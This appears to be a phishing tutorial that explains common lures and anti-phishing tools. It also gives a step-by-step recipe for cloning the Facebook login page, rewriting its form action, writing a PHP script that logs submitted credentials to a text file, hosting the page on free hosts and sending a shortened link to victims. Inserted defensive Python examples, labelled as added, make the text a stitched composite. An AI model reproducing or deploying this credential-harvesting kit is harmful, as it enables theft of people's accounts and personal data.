
WHAT IS PHISHING?

A technique used to steal valuable information such as credit card numbers, social security numbers, user IDs and passwords.

Phishing is also known as BRAND SPOOFING. The communication (usually email) directs the user to visit a website where they are asked to update personal information, such as passwords, credit card PINs, social security numbers and bank account numbers, that the legitimate organization already has.

THE SIMPLIFIED STEPS OF PHISHING :

1. A deceptive message is sent from the phisher to the user.
2. A user provides confidential information to a phishing server (normally after some interaction with the server).
3. The phisher obtains the confidential information from the server.

HOW PHISHING WORKS?

A phishing link takes the user to a fake web page that looks like the genuine one.

TYPES OF PHISHING ATTACKS :


Phishers use a wide variety of techniques, with one common thread

1. LINK MANIPULATION
2. WEBSITE FORGERY
3. PHONE PHISHING

LINK MANIPULATION
By manipulating the links, for example www.faceb00k.com instead of www.facebook.com.

Misspelled URLs or the use of subdomains are common tricks used by phishers.
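
The two tricks named above (misspelled names and brand names placed in subdomains) can be checked mechanically when a link arrives. The following is an added example, not part of the original document; the watch list, the digit-substitution map and the `.example` hostnames are constructed assumptions.

```python
# Added example: classify hostnames against a watch list of protected brands.
PROTECTED = {"facebook.com"}  # assumed watch list (brand's registrable domain)

# Constructed map of digits commonly substituted for look-alike letters.
DIGIT_SWAPS = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s"})


def edit_distance(a, b):
    """Levenshtein distance, used to catch dropped or swapped characters."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(host):
    """Return 'legitimate', 'digit-swap', 'brand-in-subdomain', 'typo' or 'unrelated'."""
    labels = host.lower().rstrip(".").split(".")
    # Simplification: treat the last two labels as the registrable domain.
    # Production code should consult the Public Suffix List instead.
    registrable, subdomains = ".".join(labels[-2:]), labels[:-2]
    if registrable in PROTECTED:
        return "legitimate"
    for brand in PROTECTED:
        brand_name = brand.split(".")[0]
        if registrable.translate(DIGIT_SWAPS) == brand:
            return "digit-swap"          # e.g. faceb00k.com
        if brand_name in subdomains:
            return "brand-in-subdomain"  # brand is only a label under another domain
        if edit_distance(registrable, brand) <= 2:
            return "typo"                # e.g. one dropped letter
    return "unrelated"


if __name__ == "__main__":
    # Constructed sample hostnames; the .example names are placeholders.
    for h in ["www.facebook.com", "www.faceb00k.com",
              "facebook.com.account-verify.example", "facebok.com", "example.org"]:
        print(f"{h:40} {classify(h)}")
```

The edit-distance threshold of 2 is a tuning choice; short brand names need a tighter threshold to avoid false positives.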

WEBSITE FORGERY :

The hacker needs to generate a duplicate address bar using JavaScript. With the script, the original URL is hidden and the phisher's duplicate URL is displayed in the address bar. Seeing the modified address bar, the user thinks that the URL is genuine and provides private information such as login ID, passwords and PIN to the attacker.

Above is the website of Citibank with a fake address bar.

PHONE PHISHING
Not all phishing attacks require a fake website. Some messages claiming to be from a bank tell the user that there is a problem with their phone account and advise them to dial a number that looks like it is owned by the bank but is actually owned by the attackers. The attackers use fake caller ID to call the user, so the user thinks that the call is from a trusted organization.

The user dials that number, and a recorded message plays and tells the user to enter their bank account number and password.
Phone phishing is also referred to as voice phishing, or VISHING.

EXAMPLE OF PHISHING ATTACKS


WWW.FACEBOOK.COM

Step 1:
Go to facebook.com. Right-click on the white space of the front page. Select "View Page Source". Copy the code to Notepad. OR

Click View Source from the toolbar.

After clicking on the source you will find the HTML code of facebook.com. You just need to copy that code into the Notepad file.

Step 2:
Now search (press Ctrl+F) for "action=" in that code. You will find code like this:

By default, the Action= in the code points to the original Facebook login page. You will find something like
Action= https://www.facebook.com/login.php

To divert the flow of that data from the original Facebook site to the hacker, you have to redirect the action to another file, let us say

Action=next.php

Next.php is another file, created by the hacker to store the user IDs and passwords submitted by a victim.

Step 3:
Now we need to create the "next.php" to store the password. so open the notepad and type the following code: <?php header("Location: http://www.Facebook.com/login.php "); $handle = fopen("passwords.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> save this file as "next.php".

Step 4:
Open Notepad and just save the file as "pswrds.txt" without any contents. Now upload those three files (namely index.html, next.php, passwords.txt) to any domain using a free web hosting site. There are many free web hosting sites which provide a free domain to the user. Some free web hosting sites are: 000webhost.com, Freehostingforu.com, 360gb.com, Host1free.com

EASY STEPS TO CREATE FREE WEB HOSTING SITE

Step 1:
Go to any of the free web hosting sites and sign up.

Step 2:
After completing the sign-up process you will get a domain and password through email. Log in using that email ID and password.

Step 3:
After login you will get the control panel for your domain. In the control panel click on the File Manager option and upload all 3 files which are required for the phishing site.

index.php : For loading the Facebook login page
next.php : To divert information to the hacker when the user clicks on the Login button
password.php : For storing the IDs and passwords of victims.

Now you are done with phishing the Facebook site. You just need to create a tiny URL of your free hosting website domain using www.tinyurl.com.

You just need to copy and paste the tiny URL link to the victim.
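
Seen from the defending side, the cloned page built in the steps above has a checkable trait: its password form no longer submits to the brand's own HTTPS origin. The following added example (not code from the original document) extracts where password forms on a page submit and flags off-brand targets; the brand host list, the sample HTML and the `.example` URL are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

BRAND_HOSTS = {"www.facebook.com"}  # assumed list of official login hosts


class LoginFormFinder(HTMLParser):
    """Collect the action of every <form> that contains a password input."""

    def __init__(self):
        super().__init__()
        self.current = None  # state of the form currently being parsed
        self.actions = []    # raw action values of password-bearing forms

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.current = {"action": a.get("action") or "", "pw": False}
        elif tag == "input" and self.current is not None:
            if (a.get("type") or "").lower() == "password":
                self.current["pw"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self.current is not None:
            if self.current["pw"]:
                self.actions.append(self.current["action"])
            self.current = None


def off_brand_targets(page_url, html, brand_hosts=BRAND_HOSTS):
    """Return absolute password-form targets that are not an HTTPS brand host."""
    finder = LoginFormFinder()
    finder.feed(html)
    finder.close()
    flagged = []
    for action in finder.actions:
        target = urljoin(page_url, action)  # resolve relative actions like next.php
        parts = urlsplit(target)
        if parts.scheme != "https" or parts.hostname not in brand_hosts:
            flagged.append(target)
    return flagged


# Constructed sample pages: a genuine-style form and a clone with a rewritten action.
FIELDS = '<input type="text" name="email"><input type="password" name="pass"></form>'
GENUINE = '<form action="https://www.facebook.com/login.php" method="post">' + FIELDS
CLONE = '<form action="next.php" method="post">' + FIELDS

if __name__ == "__main__":
    print(off_brand_targets("https://www.facebook.com/", GENUINE))
    print(off_brand_targets("http://login-page.example/index.html", CLONE))
```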

WWW.CRUSHBITS.COM
Fraud sites like www.crushbits.com are used to fool people or to play pranks on friends. Below is the crushbits sign-up page.

After completing the sign-up process you will get a URL at your given email ID.

When you give this URL to your friends using SMS, email or chat, they will be redirected to the following page.

The phishing site will ask the user for their crush. When the user enters the crush and clicks on the "Click to find out" button, they will be shown a message that they have been fooled.

When the attacker logs into their account, they will be notified about all the victims with their crushes.

ANTI PHISHING TECHNIQUES


Anti-phishing techniques are techniques to prevent phishing attacks. The anti-phishing techniques can in general be divided into three categories.

1. SPAM FILTERS
2. ANTI-PHISHING TOOL BARS AND
3. PASSWORD PROTECTION MECHANISM

ADVANTAGES OF ANTI-PHISHING :

Protects you from phishing attacks.

When a phishing website or phishing email appears, it informs the user. Some anti-phishing software also allows seeing the hosting location and risk rating of every site you visit.

DISADVANTAGES OF ANTI-PHISHING :
No single technology will completely stop phishing, so phishing attacks cannot be completely stopped. Even anti-phishing software should be upgraded with respect to the phishing attacks.